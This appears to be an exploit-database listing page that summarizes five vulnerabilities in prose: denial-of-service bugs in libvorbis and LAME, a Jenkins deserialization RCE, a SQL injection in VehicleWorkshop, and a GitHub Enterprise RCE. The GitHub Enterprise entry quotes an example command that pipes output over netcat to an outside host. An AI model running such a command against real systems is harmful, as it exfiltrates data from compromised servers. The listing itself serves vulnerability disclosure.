Explore Vulnerabilities

Explore all Exploits:

libvorbis multiple vulnerabilities

The vorbis_analysis_wrote function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service (OOM) via a crafted wav file. The vorbis_block_clear function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service (NULL pointer dereference and application crash) via a crafted ogg file.

Jenkins CVE-2016-0792 Deserialization Remote Exploit

This exploit allows an attacker to execute arbitrary code on a vulnerable Jenkins server. It is based on CVE-2016-0792, a deserialization vulnerability in Jenkins. The exploit works by sending a specially crafted payload to the Jenkins server, which is then deserialized and executed. The payload contains a command that is executed on the server, allowing the attacker to gain access to the server.

VehicleWorkshop SQL Injection

The VehicleWorkshop application is vulnerable to SQL injection due to the lack of input validation on the 'vahicleid' parameter in the 'viewvehiclestoremore.php' page. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable page, which can be used to extract sensitive information from the database.

GitHub Enterprise < 2.8.7 Remote Code Execution

This exploit allows an attacker to execute arbitrary code on a vulnerable GitHub Enterprise server. The exploit works by sending a specially crafted payload to the server via a POST request. The payload contains a malicious marshal code which is then executed by the server. The code is then used to execute a command on the server, such as 'id | nc orange.tw 12345'. The exploit can be triggered by inserting a webhook from the settings page of a repository and then triggering the RCE from the search page.

LAME multiple vulnerabilities

The fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service (heap-buffer-overflow and application crash) via a crafted wav file. The lame_encode_buffer_sample_t function in libmp3lame/lame.c in LAME 3.99.5 can cause a denial of service (heap-buffer-overflow and application crash) via a crafted wav file.

Recent Exploits: